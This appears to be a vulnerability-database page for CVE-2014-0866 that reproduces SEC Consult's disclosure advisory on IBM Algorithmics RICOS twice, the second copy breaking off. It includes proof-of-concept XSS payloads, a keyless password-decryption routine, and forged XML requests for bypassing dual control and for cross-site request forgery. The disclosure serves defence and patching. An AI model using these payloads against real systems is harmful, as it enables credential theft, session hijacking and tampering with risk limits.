ID CVE-2014-0866 Type cve Reporter NVD Modified 2017-08-28T21:34:17
Description
RICOS in IBM Algo Credit Limits (aka ACLM) 4.5.0 through 4.7.0 before 4.7.0.03 FP5 in IBM Algorithmics sends cleartext credentials over HTTP, which allows remote attackers to obtain sensitive information by sniffing the network.
{"result": {"seebug": [{"lastseen": "2017-11-19T13:21:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-02T00:00:00", "type": "seebug", "title": "IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0864", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0867", "CVE-2014-0868", "CVE-2014-0869", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0894"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87112", "id": "SSV:87112", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 >\r\n=======================================================================\r\n title: Multiple severe vulnerabilities\r\n product: IBM Algorithmics RICOS\r\n vulnerable version: 4.5.0 - 4.7.0\r\n fixed version: 4.7.0.03\r\n CVE number: CVE-2014-0894\r\n CVE-2014-0871\r\n CVE-2014-0870\r\n CVE-2014-0869\r\n CVE-2014-0868\r\n CVE-2014-0867\r\n CVE-2014-0866\r\n CVE-2014-0865\r\n CVE-2014-0864\r\n impact: critical\r\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\r\n found: 2013-12-19\r\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n \r\nVendor description:\r\n- -------------------\r\nIBM Algorithmics software enables financial institutions and corporate\r\ntreasuries to make risk-aware business decisions. Supported by a global\r\nteam of risk experts based in all major financial centers, IBM\r\nAlgorithmics solution offerings include market, credit and liquidity risk,\r\nas well as collateral and capital management.\r\n \r\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\r\n \r\nRICOS is a pre-deal limit management solution part of the Algo Suite.\r\n \r\n \r\nBusiness recommendation:\r\n- ------------------------\r\nThe identified vulnerabilities affect integrity and confidentiality of the\r\nrisk management system. SEC Consult does not recommend to rely on RICOS as\r\npart of risk management until a thorough security review has been performed\r\nby security professionals. As a workaround, access should be limited only to\r\ntrusted users internally and sample checks regarding the plausibility of limits\r\nshould be performed manually.\r\n \r\n \r\nVulnerability overview/description:\r\n- -----------------------------------\r\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\r\nThe Tomcat configuration discloses technical details within error messages to\r\nthe user, which allows an attacker to collect valuable data about the\r\nenvironment of the solution.\r\n \r\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\r\nThe password and the username of the backend database are disclosed in\r\nclear-text to the user of the web application. This allows attackers to\r\ndirectly connect to the backend database and manipulate arbitrary data stored\r\nin the database (e.g. limits).\r\n \r\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\r\nSeveral parameters in the RICOS web front end and the Blotter are not properly\r\nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal\r\nuser sessions and impersonate other users while performing arbitrary actions\r\non behalf of the victim user.\r\n \r\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\r\nWeak cryptographic algorithms, being used to store and transfer\r\nuser's passwords, allow an attacker to retrieve the plain-text passwords\r\nwithout further knowledge of cryptographic keys.\r\n \r\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\r\nCVSS 3.5)\r\nSeveral fields of stored data within RICOS are marked as read-only in the web\r\napplication, disallowing modification of certain fields. These checks are only\r\nperformed client-side, allowing an attacker to alter arbitrary data. An\r\nattacker can create a limit, alter the username of the created limit and\r\nconfirm the limit himself, circumventing dual control mechanisms advertised by\r\nRICOS.\r\n \r\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\r\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\r\ncookies for a user that clicks on a manipulated link.\r\n \r\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\r\nThe RICOS fat client submits user credentials in plain-text. An attacker with\r\naccess to the network communication can perform man-in-the-middle attacks and\r\nsteal user credentials.\r\nThis vulnerability also applies to the Blotter, where authentication is\r\nperformed unencrypted.\r\n \r\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\r\nThe RICOS fat client performs input validation only client-side. This allows\r\nan attacker to alter arbitrary data. An attacker can create a limit, alter\r\nthe username of the created limit and confirm the limit himself, circumventing\r\ndual control mechanisms advertised by RICOS.\r\n \r\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\r\nThe web application does not verify that requests are made only from within\r\nthe web application, allowing an attacker to trick users into performing\r\nrequests to the web application. This allows an attacker to perform tasks on\r\nbehalf of the victim user like modifying limits.\r\n \r\n \r\nProof of concept:\r\n- -----------------\r\n1) Information Disclosure\r\nThe following URL causes a status 404, disclosing the Tomcat version:\r\nhttps://ricos/ricos470/classes/\r\n \r\nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace\r\nis triggered\r\n \r\n2) Password Disclosure\r\nThe following request sent by the client during regular communication shows the\r\ndatabase connection settings including the username and the password in\r\nclear-text.\r\n \r\nPOST /ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n \r\n...SNIP...\r\n<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i\r\nn="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t\r\nn="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"\r\nv="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i\r\nn="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i\r\nn="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"\r\nv="password"/>\r\n...SNIP...\r\n \r\n3) Non-permanent Cross-Site Scripting\r\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\r\n \r\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\r\nHost: ricos\r\n \r\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\r\n \r\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x\r\n \r\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//\r\n \r\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\r\n \r\n \r\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>\r\n \r\n4) Broken Encryption\r\nThe user's password is transported frequently in requests within the application.\r\nThe following function decrypts the password without requiring any cryptographic key:\r\n \r\npublic static void decrypt(String string)\r\n{\r\n int nRadix = 32;\r\n int nR2 = nRadix * nRadix / 2;\r\n GregorianCalendar cal = new GregorianCalendar();\r\n String key = string.substring(0, 2);\r\n int nKey = Integer.parseInt(key, 32);\r\n \r\n String encPw = string.substring(2, string.length());\r\n int y = 0;\r\n for (int i = 0; i < encPw.length(); i+=2)\r\n {\r\n String aktuell = encPw.substring(i,i+2); \r\n int new_value = Integer.parseInt(aktuell, 32);\r\n int character = - nKey * (y + 1) % nR2 + new_value;\r\n char decrypt = (char) character;\r\n System.out.print(decrypt);\r\n y = y + 1;\r\n } \r\n}\r\n \r\n5) Manipulation of read-only data / dual control mechanism bypass\r\nThe following example illustrates how to manipulate a request so that the server\r\nsaves it on behalf of another user (only the relevant parts are shown):\r\n \r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.getmeta_udf"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#OutputData">\r\n <t n="#MapTable">\r\n <i n="#ResultData" v="#ResultData"/>\r\n <i n="#ResultTable" v="#ResultTable"/>\r\n </t>\r\n </t>\r\n <t n="#InputData">\r\n <t n="#WorkTable">\r\n <t n="det_limit">\r\n <i n="SCTYGEID" v="A"/>\r\n[...]\r\n <i n="LMLCURID" v="other_user"/>\r\n <i n="LMEQEPSTDA" v=""/>\r\n[...]\r\n <i n="MFURID" v="other_user"/>\r\n <i n="LMEVFL" v="N"/>\r\n <i n="SOLMFL" v="N"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n <i n="MFURID" v="other_user"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n[...]\r\n </t>\r\n <t n="Session">\r\n <t n="SessionData">\r\n <i n="LoginUser" v="other_user"/>\r\n <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>\r\n[...]\r\n <i n="LoginUser v="other_user"/>\r\n <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>\r\n <i n="URN" v=""/>\r\n <i n="SecServiceURN" v="obsv2:ricos:20100"/>\r\n[...]\r\n </t>\r\n <t n="ObServer">\r\n <i n="UserId" v="other_user"/>\r\n <i n="Password" v=""/>\r\n <i n="Host" v="ricos"/>\r\n[...]\r\n <i n="Prefix" v="RICA"/>\r\n <i n="DbSystem" v="oracle"/>\r\n <i n="LoginUserId" v="other_user"/>\r\n </t>\r\n </t>\r\n </t>\r\n</ds>\r\n \r\n6) Cross-Site Cookie Setting\r\nThe following URL allows setting of arbitrary cookies:\r\n \r\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\r\n \r\n7) Plain-text submission of passwords\r\nNeither the fat client nor the Blotter use https to communicate with the\r\nbackend server. Both send unencrypted credentials via http during authentication.\r\n \r\n8) Client-side Input Validation\r\nBy manipulating serialized objects that are transmitted by the fat client,\r\nit is possible to change the user name who created a limit, allowing an attacker\r\nto bypass dual control mechanisms.\r\n \r\n9) Cross-Site Request Forgery\r\nThe following request, sent on behalf of an authenticated user will e.g.\r\nchange the currency of a given deal:\r\n \r\nPOST http://ricos/ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n \r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.updrec_msp"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#InputData">\r\n <t n="#MapTable">\r\n <i n="#InputData" v="det_msp"/>\r\n </t>\r\n <t n="#WorkTable">\r\n <t n="det_msp">\r\n <i n="SYPMID" v="SYS-PAR-ID"/>\r\n <i n="CUCD" v="USD"/>\r\n <i n="MIGORILV" v="11"/>\r\n <i n="ILPLMVFL" v="Y"/>\r\n <i n="ILNEMVFL" v="Y"/>\r\n <i n="BSCUONFL" v="N"/>\r\n <i n="PBSCUOFL" v="N"/>\r\n <i n="LORICUTEFL" v="N"/>\r\n <i n="SYSAVAILFL" v="F"/> \r\n <i n="CUSTID" v="CUSTOMER"/>\r\n <i n="CBNALI" v="IS-LOCATED-IN"/>\r\n <i n="CBNAAG" v="AUTOMATIC-GROUP"/>\r\n <i n="UDF1" v="Welcome to ricos 4.71"/>\r\n </t>\r\n...SNIP...\r\n \r\n \r\nVulnerable / tested versions:\r\n- -----------------------------\r\nIBM Algorithmics RICOS 4.71\r\n \r\n \r\nVendor contact timeline:\r\n- ------------------------\r\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\r\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\r\n asking for acknowledgements\r\n2014-01-24: Sending acknowledgements\r\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\r\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\r\n2014-02-10: Providing further information on assumed to be false positive issue 1441\r\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\r\n patches are scheduled for end of June 2014\r\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\r\n2014-05-27: Vendor announces that patches will be released on 2014-06-30\r\n2014-06-26: Vendor published patches and security bulletin\r\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n2014-06-30: SEC Consult publishes the advisory\r\n \r\n \r\nSolution:\r\n- ---------\r\nApply patch ACLM 4.7.0.03 FP5. More information:\r\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n \r\n \r\nWorkaround:\r\n- -----------\r\nLimit access to RICOS and manually perform sample checks regarding the\r\nplausibility of limits.\r\n \r\n \r\nAdvisory URL:\r\n- -------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n \r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n \r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n \r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n \r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n \r\nInterested to work with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n \r\nEOF F. Lukavsky / @2014\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n \r\niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+\r\nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg\r\nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F\r\nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e\r\n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl\r\nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=\r\n=OFL7\r\n-----END PGP SIGNATURE-----\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87112", "status": "poc"}], "exploitdb": [{"lastseen": "2016-02-03T20:10:13", "osvdbidlist": ["108506", "108507", "108513", "108511", "108512", "108622", "108509", "108505", "108621", "108624", "108510", "108623", "108508"], "references": [], "edition": 1, "description": "IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities. CVE-2014-0864,CVE-2014-0865,CVE-2014-0866,CVE-2014-0867,CVE-2014-0868,CVE-2014-0869,CVE-2014...", "reporter": "SEC Consult", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-07-01T00:00:00", "id": "EDB-ID:33942", "href": "https://www.exploit-db.com/exploits/33942/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 >\r\n=======================================================================\r\n title: Multiple severe vulnerabilities\r\n product: IBM Algorithmics RICOS\r\n vulnerable version: 4.5.0 - 4.7.0\r\n fixed version: 4.7.0.03\r\n CVE number: CVE-2014-0894\r\n CVE-2014-0871\r\n CVE-2014-0870\r\n CVE-2014-0869\r\n CVE-2014-0868\r\n CVE-2014-0867\r\n CVE-2014-0866\r\n CVE-2014-0865\r\n CVE-2014-0864\r\n impact: critical\r\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\r\n found: 2013-12-19\r\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\nVendor description:\r\n- -------------------\r\nIBM Algorithmics software enables financial institutions and corporate\r\ntreasuries to make risk-aware business decisions. Supported by a global\r\nteam of risk experts based in all major financial centers, IBM\r\nAlgorithmics solution offerings include market, credit and liquidity risk,\r\nas well as collateral and capital management.\r\n\r\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\r\n\r\nRICOS is a pre-deal limit management solution part of the Algo Suite.\r\n\r\n\r\nBusiness recommendation:\r\n- ------------------------\r\nThe identified vulnerabilities affect integrity and confidentiality of the\r\nrisk management system. SEC Consult does not recommend to rely on RICOS as\r\npart of risk management until a thorough security review has been performed\r\nby security professionals. As a workaround, access should be limited only to\r\ntrusted users internally and sample checks regarding the plausibility of limits\r\nshould be performed manually.\r\n\r\n\r\nVulnerability overview/description:\r\n- -----------------------------------\r\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\r\nThe Tomcat configuration discloses technical details within error messages to\r\nthe user, which allows an attacker to collect valuable data about the\r\nenvironment of the solution.\r\n\r\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\r\nThe password and the username of the backend database are disclosed in\r\nclear-text to the user of the web application. This allows attackers to\r\ndirectly connect to the backend database and manipulate arbitrary data stored\r\nin the database (e.g. limits).\r\n\r\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\r\nSeveral parameters in the RICOS web front end and the Blotter are not properly\r\nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal\r\nuser sessions and impersonate other users while performing arbitrary actions\r\non behalf of the victim user.\r\n\r\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\r\nWeak cryptographic algorithms, being used to store and transfer\r\nuser's passwords, allow an attacker to retrieve the plain-text passwords\r\nwithout further knowledge of cryptographic keys.\r\n\r\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\r\nCVSS 3.5)\r\nSeveral fields of stored data within RICOS are marked as read-only in the web\r\napplication, disallowing modification of certain fields. These checks are only\r\nperformed client-side, allowing an attacker to alter arbitrary data. An\r\nattacker can create a limit, alter the username of the created limit and\r\nconfirm the limit himself, circumventing dual control mechanisms advertised by\r\nRICOS.\r\n\r\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\r\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\r\ncookies for a user that clicks on a manipulated link.\r\n\r\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\r\nThe RICOS fat client submits user credentials in plain-text. An attacker with\r\naccess to the network communication can perform man-in-the-middle attacks and\r\nsteal user credentials.\r\nThis vulnerability also applies to the Blotter, where authentication is\r\nperformed unencrypted.\r\n\r\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\r\nThe RICOS fat client performs input validation only client-side. This allows\r\nan attacker to alter arbitrary data. An attacker can create a limit, alter\r\nthe username of the created limit and confirm the limit himself, circumventing\r\ndual control mechanisms advertised by RICOS.\r\n\r\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\r\nThe web application does not verify that requests are made only from within\r\nthe web application, allowing an attacker to trick users into performing\r\nrequests to the web application. This allows an attacker to perform tasks on\r\nbehalf of the victim user like modifying limits.\r\n\r\n\r\nProof of concept:\r\n- -----------------\r\n1) Information Disclosure\r\nThe following URL causes a status 404, disclosing the Tomcat version:\r\nhttps://ricos/ricos470/classes/\r\n\r\nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace\r\nis triggered\r\n\r\n2) Password Disclosure\r\nThe following request sent by the client during regular communication shows the\r\ndatabase connection settings including the username and the password in\r\nclear-text.\r\n\r\nPOST /ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n\r\n...SNIP...\r\n<i n=\"URN\" v=\"\"/><i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/><i n=\"SecSource\" v=\"LM web\"/><i\r\nn=\"SecTimeout\" v=\"7200\"/><i n=\"AcsAutoReconnect\" v=\"Y\"/><i n=\"AcsFunctionLimits\" v=\"\"/></t><t\r\nn=\"ObServer\"><i n=\"UserId\" v=\"\"/><i n=\"Password\" v=\"\"/><i n=\"Host\" v=\"ricos\"/><i n=\"Port\"\r\nv=\"20100\"/><i n=\"CollectionId\" v=\"\"/><i n=\"DbName\" v=\"RICA\"/><i n=\"Location\" v=\"RICA\"/><i\r\nn=\"DbType\" v=\"ORA\"/><i n=\"Application\" v=\"RICOS\"/><i n=\"AppId\" v=\"LM web\"/><i n=\"AppDesc\" v=\"\"/><i\r\nn=\"AppVer\" v=\"4.7.0\"/><i n=\"Component\" v=\"RICOS Gui\"/><i n=\"DbUser\" v=\"rica\"/><i n=\"DbPass\"\r\nv=\"password\"/>\r\n...SNIP...\r\n\r\n3) Non-permanent Cross-Site Scripting\r\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\r\n\r\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\r\nHost: ricos\r\n\r\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\r\n\r\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x\";+alert(document.cookie);//x\r\n\r\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')\");alert(document.cookie);//\r\n\r\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N\";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\r\n\r\n\r\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse\"/><script>alert(document.cookie)</script>\r\n\r\n4) Broken Encryption\r\nThe user's password is transported frequently in requests within the application.\r\nThe following function decrypts the password without requiring any cryptographic key:\r\n\r\npublic static void decrypt(String string)\r\n{\r\n int nRadix = 32;\r\n int nR2 = nRadix * nRadix / 2;\r\n GregorianCalendar cal = new GregorianCalendar();\r\n String key = string.substring(0, 2);\r\n int nKey = Integer.parseInt(key, 32);\r\n \r\n String encPw = string.substring(2, string.length());\r\n int y = 0;\r\n for (int i = 0; i < encPw.length(); i+=2)\r\n {\r\n String aktuell = encPw.substring(i,i+2); \r\n int new_value = Integer.parseInt(aktuell, 32);\r\n int character = - nKey * (y + 1) % nR2 + new_value;\r\n char decrypt = (char) character;\r\n System.out.print(decrypt);\r\n y = y + 1;\r\n } \r\n}\r\n\r\n5) Manipulation of read-only data / dual control mechanism bypass\r\nThe following example illustrates how to manipulate a request so that the server\r\nsaves it on behalf of another user (only the relevant parts are shown):\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<ds>\r\n <t n=\"Service\">\r\n <i n=\"RequestType\" v=\"#Action\"/>\r\n <t n=\"#ActionData\">\r\n <i n=\"#ActionName\" v=\"web.getmeta_udf\"/>\r\n <i n=\"#Mode\" v=\"#Sync\"/>\r\n <i n=\"#Request\" v=\"#Execute\"/>\r\n <t n=\"#OutputData\">\r\n <t n=\"#MapTable\">\r\n <i n=\"#ResultData\" v=\"#ResultData\"/>\r\n <i n=\"#ResultTable\" v=\"#ResultTable\"/>\r\n </t>\r\n </t>\r\n <t n=\"#InputData\">\r\n <t n=\"#WorkTable\">\r\n <t n=\"det_limit\">\r\n <i n=\"SCTYGEID\" v=\"A\"/>\r\n[...]\r\n <i n=\"LMLCURID\" v=\"other_user\"/>\r\n <i n=\"LMEQEPSTDA\" v=\"\"/>\r\n[...]\r\n <i n=\"MFURID\" v=\"other_user\"/>\r\n <i n=\"LMEVFL\" v=\"N\"/>\r\n <i n=\"SOLMFL\" v=\"N\"/>\r\n[...]\r\n <i n=\"CRURID\" v=\"other_user\"/>\r\n <i n=\"MFTS\" v=\"\"/>\r\n <i n=\"MFURID\" v=\"other_user\"/>\r\n[...]\r\n <i n=\"CRURID\" v=\"other_user\"/>\r\n <i n=\"MFTS\" v=\"\"/>\r\n[...]\r\n </t>\r\n <t n=\"Session\">\r\n <t n=\"SessionData\">\r\n <i n=\"LoginUser\" v=\"other_user\"/>\r\n <i n=\"LoginPass\" v=\"8HC34BCM5JE84ND95RED\"/>\r\n[...]\r\n <i n=\"LoginUser v=\"other_user\"/>\r\n <i n=\"LoginPWD\" v=\"326K9DC9FNIT3T70A3D6\"/>\r\n <i n=\"URN\" v=\"\"/>\r\n <i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/>\r\n[...]\r\n </t>\r\n <t n=\"ObServer\">\r\n <i n=\"UserId\" v=\"other_user\"/>\r\n <i n=\"Password\" v=\"\"/>\r\n <i n=\"Host\" v=\"ricos\"/>\r\n[...]\r\n <i n=\"Prefix\" v=\"RICA\"/>\r\n <i n=\"DbSystem\" v=\"oracle\"/>\r\n <i n=\"LoginUserId\" v=\"other_user\"/>\r\n </t>\r\n </t>\r\n </t>\r\n</ds>\r\n\r\n6) Cross-Site Cookie Setting\r\nThe following URL allows setting of arbitrary cookies:\r\n\r\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\r\n\r\n7) Plain-text submission of passwords\r\nNeither the fat client nor the Blotter use https to communicate with the\r\nbackend server. Both send unencrypted credentials via http during authentication.\r\n\r\n8) Client-side Input Validation\r\nBy manipulating serialized objects that are transmitted by the fat client,\r\nit is possible to change the user name who created a limit, allowing an attacker\r\nto bypass dual control mechanisms.\r\n\r\n9) Cross-Site Request Forgery\r\nThe following request, sent on behalf of an authenticated user will e.g.\r\nchange the currency of a given deal:\r\n\r\nPOST http://ricos/ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<ds>\r\n <t n=\"Service\">\r\n <i n=\"RequestType\" v=\"#Action\"/>\r\n <t n=\"#ActionData\">\r\n <i n=\"#ActionName\" v=\"web.updrec_msp\"/>\r\n <i n=\"#Mode\" v=\"#Sync\"/>\r\n <i n=\"#Request\" v=\"#Execute\"/>\r\n <t n=\"#InputData\">\r\n <t n=\"#MapTable\">\r\n <i n=\"#InputData\" v=\"det_msp\"/>\r\n </t>\r\n <t n=\"#WorkTable\">\r\n <t n=\"det_msp\">\r\n <i n=\"SYPMID\" v=\"SYS-PAR-ID\"/>\r\n <i n=\"CUCD\" v=\"USD\"/>\r\n <i n=\"MIGORILV\" v=\"11\"/>\r\n <i n=\"ILPLMVFL\" v=\"Y\"/>\r\n <i n=\"ILNEMVFL\" v=\"Y\"/>\r\n <i n=\"BSCUONFL\" v=\"N\"/>\r\n <i n=\"PBSCUOFL\" v=\"N\"/>\r\n <i n=\"LORICUTEFL\" v=\"N\"/>\r\n <i n=\"SYSAVAILFL\" v=\"F\"/> \r\n <i n=\"CUSTID\" v=\"CUSTOMER\"/>\r\n <i n=\"CBNALI\" v=\"IS-LOCATED-IN\"/>\r\n <i n=\"CBNAAG\" v=\"AUTOMATIC-GROUP\"/>\r\n <i n=\"UDF1\" v=\"Welcome to ricos 4.71\"/>\r\n </t>\r\n...SNIP...\r\n\r\n\r\nVulnerable / tested versions:\r\n- -----------------------------\r\nIBM Algorithmics RICOS 4.71\r\n\r\n\r\nVendor contact timeline:\r\n- ------------------------\r\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\r\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\r\n asking for acknowledgements\r\n2014-01-24: Sending acknowledgements\r\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\r\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\r\n2014-02-10: Providing further information on assumed to be false positive issue 1441\r\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\r\n patches are scheduled for end of June 2014\r\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\r\n2014-05-27: Vendor announces that patches will be released on 